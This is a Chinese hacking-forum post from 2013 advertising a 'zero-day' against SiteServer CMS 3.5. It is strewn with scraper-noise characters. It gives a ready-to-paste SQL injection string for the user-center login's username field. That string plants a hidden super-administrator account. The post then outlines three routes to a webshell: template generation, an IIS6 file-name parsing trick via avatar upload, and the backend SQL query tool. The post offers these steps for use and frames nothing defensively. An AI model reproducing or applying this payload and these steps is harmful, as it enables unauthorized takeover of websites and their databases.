找回密码
 立即注册
查看: 2552|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版/ s$ x" j* ~# O" V, O

6 \1 e7 R) n3 b( h7 h# H; \5 {stieserver官网:www.siteserver.cn
/ I$ _( ?- a9 k6 U/ u$ L# F* Z5 z0 w0 @5 e. z1 O' N2 }8 A6 a
3 D6 K5 u' b7 |2 m5 Z" y/ H
4 O7 F1 J. N( c9 Q- S  L( c
EXP:1 c% F: @+ Z0 I$ X7 D/ I
, @+ z+ o  X1 O0 q. Q
直接访问UserCenter/login.aspx4 c7 n# X' C+ j5 _# W8 O) e+ ?

  y+ q: {! c1 X- Z$ q
) ]6 i4 h  J4 @. H& Z
" t- J: a6 Z7 q用户名处输入:7 q6 D: v; _$ N: @4 U( M% j
. a" R! t' e8 Y3 M6 B0 c0 b
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
! P8 \* H! t! U# X' c; }: N; B4 R& y3 E# _
" {* y( F# N& n( |/ b- v
4 m+ }/ ~5 ]9 y* m3 M/ a+ D9 ]
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。1 C+ k1 A9 [4 ~" S" ~% s/ U, h
6 V- i! X) ~9 z; S( z
( a3 C0 i. l' Z, P4 w- Y
+ X3 D, }  L9 U) H& w, W/ Y% ?
之后再访问后台SiteServer/login.aspx用插入的用户登陆) h- \6 [* {' |/ t* Y

. h# q9 H4 Q' W- K3 k4 ? ! }. q6 q1 G- H. F

" w+ h* [  Z/ ]( R6 v后台拿webshell的三种方法:
* A* W4 X' G  f  R$ y& ~# [! S
7 H9 \8 d& @2 l/ v. z8 e2 F一、) r# x! R/ `4 l
# |8 a  I4 _! i- }- K0 V
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 L) e2 m: T& M7 m8 [2 ?, U
' g& K; z$ \2 U! h* E7 F/ F二、
# Z5 f% W2 Z0 C8 |; j( m0 G% L! A% x  X$ R
成员权限-》添加用户-》用户名为:1.asp
' w8 O+ P5 }9 w0 B
/ U& e* ~/ d* f* z* Ohttp://127.0.0.1/usercenter/" p$ W4 a6 ~" h% i- w5 ~3 o

1 _  l% s& s  }用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell  k- ^' W! [: {0 h) u! I
+ p8 o$ n: g+ O3 |4 w
(ps:后台添加用户时不会验证是否含有非法字符)( D2 g8 J0 N4 m$ I- Y
8 I4 ]7 u& |& P: w& e: E8 R* N
三、4 Y( K7 N# P: A9 ]8 @. ~

7 p0 H: v, K  }! P* t系统工具-》实用工具-》机器参数查看
% V6 K' v  Q+ S: A, W) {- W( ?5 k可以看到数据库类型、名称,WEB路径
' {5 @+ n# o3 ]9 B5 @2 G" `. w- |* C) y( t8 w
系统工具-》数据库工具-》SQL语句查询" D1 o/ s* T) v/ j6 @% H5 c$ s
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。- ]* e3 Q" x, {, k+ |4 i+ z/ q0 M

: r" j! X* y2 v! @+ i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表